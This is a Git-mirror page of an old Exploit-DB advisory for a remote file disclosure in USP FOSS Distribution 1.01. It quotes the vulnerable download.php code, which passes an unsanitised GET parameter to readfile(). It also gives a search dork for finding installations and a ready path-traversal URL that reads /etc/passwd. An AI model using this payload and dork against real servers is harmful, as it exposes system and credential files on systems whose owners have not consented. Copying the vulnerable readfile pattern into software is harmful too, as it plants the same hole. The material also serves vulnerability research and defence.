bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/3794.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
861 B
Text
Raw Blame History

# USP FOSS Distribution 1.01(download.php dnld)Remote File Disclosure
# D.Script: http://norcalvex.org/pagode/uspfoss_v1_01.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Dork:intitle:USP FOSS Distribution
# V.Code In /user/download.php:
###################/user/download.php###################
# <?
# $file = @$_GET['dnld'];<----[+]
# header('Content-Description: File Transfer');
# header('Content-Type: application/force-download');
# header('Content-Length: ' . filesize($file));
# header('Content-Disposition: attachment; filename=' . basename($file));
# readfile($file); <----[+]
# ?>
########################################################
# Exploit:[Path_USP FOSS]/user/download.php?dnld=../../../../../../etc/passwd
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & bd0rk
# milw0rm.com [2007-04-24]
Reference in a new issue View git blame Copy permalink